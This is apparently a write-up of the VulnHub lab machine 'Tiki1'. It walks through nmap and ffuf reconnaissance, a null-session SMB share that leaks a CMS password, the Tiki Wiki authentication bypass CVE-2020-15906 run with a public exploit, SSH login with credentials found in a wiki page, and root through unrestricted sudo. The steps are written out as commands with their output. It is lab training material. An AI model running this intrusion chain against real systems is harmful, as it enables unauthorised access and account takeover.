Recon
NMAP Complete Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
# Nmap 7.92 scan initiated Fri Jan 21 21:48:01 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Tiki1/192.168.110.104/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Tiki1/192.168.110.104/scans/xml/_full_tcp_nmap.xml 192.168.110.104
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.110.104
Host is up, received arp-response (0.00049s latency).
Scanned at 2022-01-21 21:48:02 +08 for 29s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a3:d8:4a:89:a9:25:6d:07:c5:3d:76:28:06:ed:d1:c0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0QOr55x/Sj6hKeR3ArLyVAPS5kzyAx8e3V2S9W44G2+SxkJ3lNn4WKgUwER8Rv3Dt1dmXfuQHXpRb7Fb9S4DoOh5kpY1PJLnvSyoe/w22YZthgar6Jf6q3XwoPFiaF9JBEJqsG0pFGFRccccasTgtCsT/2wE15L2To+WU6wPyZt2F6vOSC+yhVGOX9P0lnSbO6+1ZFIMKLDtAQU/o++PBap87c12voIkQjzC6Nyk0EVp36NKc6AIlRhAU/RIMic8ETT+f4AAiHOxoBdATL/gJcJXXyBdlWQcZe8kw26zG2kjFrcRQBM+Zj/z91H22dCQjJXmUIRIAhiVdZvL4UG4GPLigGGqAvs7ggnIw1FrQ92diFGz0ksrQfzGvXRwZqLngjdJJMuC+8lps5GZVOevYd5bQR44BLZlZXx69kagOydRMfSKw1RuZViBIDft7KZg2f9ZLlATAIYLx6+xDexE8zKvP/eyNZWELnTbQH2StPXP12tJnSNb9Jea3dXYB4Ds=
| 256 e7:b2:89:05:54:57:dc:02:f4:8c:3a:7c:55:8b:51:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCxghOMMgnGuE/gI+7mtcnam8ybjFNjkCsoFqkD/CRe2wWtddrl6EWKDAit3QQ9GbY8WJ4EGrJiJQogW5b7c7is=
| 256 fd:77:07:2b:4a:16:3a:01:6b:e0:00:0c:0a:36:d8:2f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILaaZ/QfOgCnog0JIRtlGUoXO3Ph+bxbcGBMBXo8w4Bz
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/tiki/
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
MAC Address: 08:00:27:84:8B:BD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/21%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61E
OS:AB9AF%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B
OS:4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88
OS:)ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 15.301 days (since Thu Jan 6 14:35:14 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 7h59m57s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25773/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41069/tcp): CLEAN (Couldn't connect)
| Check 3 (port 45834/udp): CLEAN (Timeout)
| Check 4 (port 41195/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| UBUNTU<00> Flags: <unique><active>
| UBUNTU<03> Flags: <unique><active>
| UBUNTU<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb2-time:
| date: 2022-01-21T21:48:19
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 192.168.110.104
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 21 21:48:31 2022 -- 1 IP address (1 host up) scanned in 30.12 seconds
TCP/139,445 (SMB)
Enum4linux
1
2
3
4
5
6
7
8
9
10
11
[*] Users via RPC on 192.168.110.104
[*] Enumerating users via 'querydispinfo'
[+] Found 1 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 1 users via 'enumdomusers'
[+] After merging user results we have 1 users total:
'1000':
username: silky
name: Silky
acb: '0x00000010'
description: ''
- User
silky
Crackmapexec + SMBMap
- Able to read
Notesfileshare
TCP/80 (HTTP)
FFUF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root💀kali)-[~/vulnHub/Tiki1/192.168.110.104]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.110.104/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
.htaccess [Status: 403, Size: 280, Words: 20, Lines: 10]
.hta [Status: 403, Size: 280, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
.htpasswd [Status: 403, Size: 280, Words: 20, Lines: 10]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
robots.txt [Status: 200, Size: 42, Words: 4, Lines: 4]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
tiki [Status: 301, Size: 317, Words: 20, Lines: 10]
:: Progress: [4614/4614] :: Job [1/1] :: 6140 req/sec :: Duration: [0:00:02] :: Errors: 0 ::
robots.txttiki
Initial Foothold
TCP/139,445 (SMB)
- Earlier, we enumerated SMB Fileshare w/ a NULL session, we have READ access to
Notesfileshare - Download all files in
Notesfileshare & view its content1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(root💀kali)-[~/vulnHub/Tiki1/192.168.110.104/loot/smb] └─# smbclient //$ip/Notes -c 'prompt;recurse;mget *' Enter WORKGROUP\root's password: getting file \Mail.txt of size 244 as Mail.txt (14.0 KiloBytes/sec) (average 14.0 KiloBytes/sec) ┌──(root💀kali)-[~/vulnHub/Tiki1/192.168.110.104/loot/smb] └─# ls Mail.txt ┌──(root💀kali)-[~/vulnHub/Tiki1/192.168.110.104/loot/smb] └─# cat Mail.txt Hi Silky because of a current Breach we had to change all Passwords, please note that it was a 0day, we don't know how he made it. Your new CMS-password is now 51lky571k1, please investigate how he made it into our Admin Panel. Cheers Boss.
TCP/80 (HTTP)
- Proceed to
/tiki![]()
- Proceed to
/tiki/tiki-login.php![]()
- Login w/ silky:
51lky571k1![]()
- Proceed to
/tiki/tiki-listpages.php![]()
![]()
- After looking through the History of Silky homepage, found this
![]()
CVE-2020-15906
- View
CVE-2020-15906- Tiki 21.1-2- https://www.exploit-db.com/exploits/48927
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15906
![]()
- We are able to set admin’s password to a blank value after 50 failed login attempts.
- Search for exploits
1 2 3 4 5 6 7
┌──(root💀kali)-[~/vulnHub/Tiki1/192.168.110.104/loot/smb] └─# searchsploit tiki 21 ------------------------------------------------------------------------------------ Exploit Title | Path ------------------------------------------------------------------------------------ Tiki Wiki CMS Groupware 21.1 - Authentication Bypass | php/webapps/48927.py ------------------------------------------------------------------------------------
- Use exploit
1 2 3 4 5
┌──(root💀kali)-[~/vulnHub/Tiki1/192.168.110.104/exploit/tiki-21.1] └─# python3 48927.py $ip Admin Password got removed. Use BurpSuite to login into admin without a password
- Login w/ admin:blank w/ Burpsuite
- Login w/ admin:test
- Intercept w/ burp and remove the password test
![]()
- Turn off intercept
- Proceed to List Pages -> Credentials
![]()
- silky:Agy8Y7SPJNXQzqA
TCP/22 (SSH)
- SSH w/ silky:Agy8Y7SPJNXQzqA
![]()
Privilege Escalation
Root via Sudo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
silky@ubuntu:~$ sudo -l
[sudo] Passwort für silky:
Das hat nicht funktioniert, bitte nochmal probieren.
[sudo] Passwort für silky:
Passende Defaults-Einträge für silky auf ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:
(ALL : ALL) ALL
silky@ubuntu:~$ sudo su
root@ubuntu:/home/silky# whoami
root
root@ubuntu:/home/silky#
Comments powered by Disqus.